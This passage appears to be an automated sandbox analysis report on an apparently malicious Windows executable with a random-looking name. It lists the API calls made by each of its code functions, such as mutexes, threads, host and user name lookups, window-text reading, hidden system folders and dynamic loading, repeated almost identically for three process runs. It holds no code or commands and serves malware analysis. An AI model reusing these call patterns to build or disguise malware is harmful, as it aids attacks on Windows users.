SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,	6_2_01755890
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: memset,GetModuleFileNameA,StrStrIA,	6_2_01761150
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: CreateThread,StrStrIA,GetHandleInformation,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,CreateThread,wsprintfA,wsprintfA,wsprintfA,CreateThread,wsprintfA,	6_2_0174C9F0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,	6_2_017611C0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,	6_2_01741180
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: GetUserNameA,memset,InitializeCriticalSection,StrStrIA,	6_2_01759860
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,	6_2_01747020
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,	6_2_0175B810
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,	6_2_01762320
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,	6_2_01760BE0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError,	6_2_01743510
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,	6_2_0175FDC0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,	6_2_01762590
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,	6_2_017544F0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,	6_2_0175FFE0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,	6_2_01741670
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,	7_2_03115890
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,	7_2_03122320
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,	7_2_03120BE0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: memset,GetModuleFileNameA,StrStrIA,	7_2_03121150
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,	7_2_03101180
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,	7_2_031211C0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: CreateThread,StrStrIA,GetHandleInformation,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,CreateThread,wsprintfA,wsprintfA,wsprintfA,CreateThread,wsprintfA,	7_2_0310C9F0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,	7_2_0311B810
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,	7_2_03107020
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: GetUserNameA,memset,InitializeCriticalSection,StrStrIA,	7_2_03119860
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,	7_2_0311FFE0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,	7_2_03101670
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError,	7_2_03103510
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,	7_2_03122590
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,	7_2_0311FDC0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,	7_2_031144F0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,	10_2_01535890
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: memset,GetModuleFileNameA,StrStrIA,	10_2_01541150
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,	10_2_015411C0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: CreateThread,StrStrIA,GetHandleInformation,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,CreateThread,wsprintfA,wsprintfA,wsprintfA,CreateThread,wsprintfA,	10_2_0152C9F0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,	10_2_01521180
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: GetUserNameA,memset,InitializeCriticalSection,StrStrIA,	10_2_01539860
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,	10_2_0153B810
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,	10_2_01527020
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,	10_2_01542320
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,	10_2_01540BE0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError,	10_2_01523510
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,	10_2_0153FDC0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,	10_2_01542590
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,	10_2_015344F0
